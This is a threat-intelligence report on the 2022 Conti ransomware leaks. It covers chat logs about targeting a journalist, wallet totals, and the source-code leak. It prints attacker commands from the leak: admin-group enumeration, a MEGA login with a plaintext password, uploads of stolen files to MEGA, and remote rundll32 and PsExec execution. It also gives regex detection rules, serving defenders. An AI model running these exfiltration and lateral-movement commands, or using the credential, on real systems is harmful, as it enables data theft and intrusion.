A show of support for Russia's government exposes data

A show of support for the government of Russia led to the exposure of classified information from the Conti group

Following the Conti group's announcement of support for the Russian government, an anonymous person identified on Twitter only as ContiLeaks declared his support for Ukraine in the ongoing war. On February 27 he began leaking the ransomware group's internal information: just over a year of recorded conversations between its operators, victims, and other key individuals, as well as technical details of the attacks carried out and the infrastructure used, amounts received, and even cryptocurrency wallet addresses, some still holding money from ransoms received.

Conversation History

One of the richest materials for threat-intelligence purposes is the record of conversations between Conti members. Its content is extensive and still under analysis, but it has already produced important revelations, such as a possible association between the group and the FSB (the Russian intelligence agency that replaced the KGB).

In April last year, two members discussed a targeted hack of a journalist from the Bellingcat group, specifically seeking files on Alexei Navalny, a former political opponent of Vladimir Putin who was poisoned in August 2020.

"Bro is such a question - we work on politics?)"
"in what respect?"
"<Johnyboy77> If the info is some kind of important supposedly
[21:04:21] <Johnyboy77> or just score?
[21:10:55] <Mango> Hi Bro
[21:11:06] <Mango> Come on)
[21:11:12] <Johnyboy77> Property
[21:11:13] <Mango> In general, we work for loot :)
[21:11:20] <Mango> And fuck from whom to demand it
[21:11:22] <Johnyboy77> I merged the correspondence of people who are working
against the Russian Federation
[21:11:25] <Johnyboy77> in the information field
[21:11:31] <Johnyboy77> But I can not decipher
[21:11:34] <Johnyboy77> Correspondence of the signal
[21:11:52] <Johnyboy77> shorter journalists
[21:11:54] <Mango> I will ask)
[21:11:55] <Johnyboy77> which are pussy against the Russian Federation
[21:12:04] <Johnyboy77> current file brooms fucking can not decipher
[21:12:13] <Johnyboy77> piece of concrete happened "
"We need this?"
"I don't know how to decorate a signal"
"Or we are current for loot and without political fuss"
"This is E2E"
"Soron I can not do anything here ("
"I even want to help \ Note to help"
"So, in general, we are interested in such data?"
"Ie we are patriots or how?)))"
"We are of course patriots)"
"I understood. If they decipher there - the Mayakna"
"And I wrote there other day to you about Aucion, but I understand you while
busy and did not delve)"
[21:21:02] <Johnyboy77> in short So say
[21:21:08] <Johnyboy77> And all of his passwords are
[21:21:17] <Johnyboy77> And she is still Valid
[21:30:56] <Mango> Well Corresponders at least Zaskrinh them
[21:31:05] <Mango> Need spectects bro what to say
[21:31:07] <Johnyboy77> Pink out files
[21:31:12] <Johnyboy77> navalni FSB

Some time later there is a follow-up reminder, with a reference to a "boss":

"Bro about Navalny do not forget, I looked at the chief - he is waiting for details"

The story under discussion is probably Hunting the Hunters: How We Identified Navalny's FSB Stalkers, which details how the Bellingcat team identified the FSB officers involved in monitoring and tracking Navalny at the time of his poisoning.

The conversations also revealed addresses of bitcoin wallets used by the group. A count by the vx-underground group showed that between April 21, 2017 and February 28, 2022, Conti's main wallet accumulated about $2.7 billion.

Apparently, the ransomware group has not yet been able to identify who is leaking their data on Twitter. Chat logs from March 1, 2022 show the internal confusion:

"ts": "2022-03-01T14:09:27.345914",
"from": "qwerty@q3mcco35auwcstmt.onion",
"to": "cybergangster@q3mcco35auwcstmt.onion",
"body": "Listen, Azim and Smelian wrote me today, they're worried they're
falling over17:09that they've been messing with us17:09what should I tell them?"
"ts": "2022-03-01T16:12:42.619523",
"from": "wind@q3mcco35auwcstmt.onion",
"to": "mango@q3mcco35auwcstmt.onion",
"body": "who leaked, did you find out?{backslash}do you think we'll rebel?"

It is interesting to note that the recipient of the second message, Mango, is the same person involved in the April 2021 conversation about Alexei Navalny. There are several mentions of the Cobalt Strike tool in the leaks; the commands and legitimate binaries (LOLbins) associated with it are covered in the following section.

Cobalt Strike and LOLbins

Among the leaks released so far, Conti Rocket Chat Leaks.7z (7B49130E26505A6AC3786591F548D492DD6D83CE8986477AD803FD04615209F8) contains a number of instances of legitimate Windows executables being abused during Conti intrusions. Pay special attention to commands beginning with "shell": these are passed to the command prompt of the infected machine, which makes them very easy to detect.

We will not attach the full contents of this leak to this document, since it contains internal network data of the group's victims. For those interested in extracting every occurrence of Cobalt Strike use from the file in question, we recommend the following command, adapted from @c3rb3ru5d3d53c:

# list the dated chat exports (YYYY-MM-DD.json) and print only the Cobalt Strike beacon lines
find . -type f -name "*.json" | grep -P '\d+-\d+-\d+\.json' | while read -r i; do
    jq -r '.messages[].msg' "$i" | grep 'beacon>'
done

Some commands relevant to the detection of Conti activity follow.

Commands redirected from CS to the command prompt:
reg query HKCU\Environment
net localgroup administrators
net group "Domain admins" /dom
net group "Enterprise admins" /dom
start /b MEGAcmdServer.exe
MEGAclient.exe update --auto=off
MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd
MEGAclient.exe whoami
MEGAclient.exe put -q --ignore-quota-warn "C:\Users\*****\Documents\Outlook Files\ol.7z"
MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
wmic /node:10...* process call create "rundll32 C:\ProgramData\xx64.dll entryPoint"
PsExec \\* -d -s -h gpupdate /force -accepteula -y -u .local* -p *

We suppressed sensitive target information in the examples above. It is worth noting that good detection practices would already alert on several of the listed commands, such as the use of -accepteula to run Sysinternals tools. It is also possible to see that Conti used MEGA (formerly Megaupload) for some of its activities. Whether this behavior persists in the group's current intrusions is unclear.
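As an added example (not part of the original report, the leak, or any tool it mentions), the following Python script combines the two steps above: it pulls the beacon> lines out of a chat export in the .messages[].msg layout the jq command reads, then matches each one against detection rules distilled from the command list. The export content and the rule labels are constructed for illustration.

```python
import json
import re

# Constructed sample in the .messages[].msg layout the jq command above reads;
# these lines are illustrative and not copied from the actual leak.
SAMPLE_EXPORT = json.dumps({"messages": [
    {"msg": "beacon> shell net group \"Domain admins\" /dom"},
    {"msg": "beacon> shell reg query HKCU\\Environment"},
    {"msg": "ok, checking"},
    {"msg": "beacon> shell MEGAclient.exe put -q --ignore-quota-warn F:\\SQLBackup\\*.bak"},
    {"msg": "beacon> shell PsExec \\\\* -d -s -h gpupdate /force -accepteula"},
    {"msg": "beacon> shell wmic /node:10.0.0.5 process call create \"rundll32 C:\\ProgramData\\x.dll entryPoint\""},
]})

# Detection rules distilled from the command list above: (pattern, label)
RULES = [
    (re.compile(r'\bnet\s+group\s+"?(domain|enterprise) admins"?', re.I), "AD admin group enumeration"),
    (re.compile(r"\breg\s+query\s+HKCU\\Environment", re.I), "user environment recon"),
    (re.compile(r"\bMEGA(client|cmdServer)\.exe\b", re.I), "MEGA client present (possible exfiltration)"),
    (re.compile(r"-accepteula\b", re.I), "Sysinternals EULA auto-accept"),
    (re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I), "WMI remote process creation"),
    (re.compile(r"\brundll32\b", re.I), "rundll32 DLL execution"),
]


def beacon_commands(export_text):
    """Equivalent of `jq -r '.messages[].msg' | grep 'beacon>'` on one export file."""
    data = json.loads(export_text)
    return [m["msg"] for m in data.get("messages", []) if "beacon>" in m.get("msg", "")]


def classify(command):
    """Labels of every rule that fires on a single beacon line, in RULES order."""
    return [label for pattern, label in RULES if pattern.search(command)]


def triage(export_text):
    """Map each beacon command to the rules it triggers (empty list means no hit)."""
    return {cmd: classify(cmd) for cmd in beacon_commands(export_text)}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EXPORT).items():
        print(("ALERT " if hits else "      ") + cmd, hits)
```

Running it over a real export directory is a matter of calling triage() on each file the find command lists; a line with an empty hit list is still worth reading, since the rule set only covers the commands discussed here.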

Source code and builder

The hardest blow against the criminal group came on March 1 with the leak of the ransomware's source code, accompanied by its builder (the executable used to generate the final version that is sent to victims).

This content is protected by a password that the user ContiLeaks provided to a small group of researchers. A second version, released shortly thereafter without a password, omitted the ransomware code and its main functions. Because the archive used a deprecated encryption protocol, this second version could be used to extract the protected content of the complete leak. Within that content, the builder is protected by a second, as yet undiscovered, password.

It is likely that new ransomware groups and low-skill malicious actors will leverage the Conti source code to generate their own versions of this malware. For this reason, we will not share where to get the full leak or how to extract its contents without the password. Minimally competent researchers will be able to obtain this information easily.

Conclusion

This is still a developing situation. The analysis of so much material, whether in the form of code or in the form of chat logs, will take time. It seems that the leaker of the information has not yet been discovered by the group and should continue to publish information from Conti. We will keep everyone updated on our research involving this material and share as much information as possible with the security community.

For those who want to work directly with the leaks, you can download the compressed files at hxxps://share[.]vx-underground[.]org/Conti/. English translations of materials are available at the following GitHub addresses:

https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished

Finally, the bibliographic references in this report contain additional information; we recommend reading them.

Bibliographic references

https://twitter.com/ContiLeaks/
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
https://blog.malwarebytes.com/threat-intelligence/2022/03/the-conti-ransomware-leaks/
https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/
https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/
https://arstechnica.com/information-technology/2022/03/conti-cybergang-gloated-when-leaking-victims-data-now-the-tables-are-turned/
https://www.theregister.com/2022/02/28/conti_ransomware_gang_chats_leaked
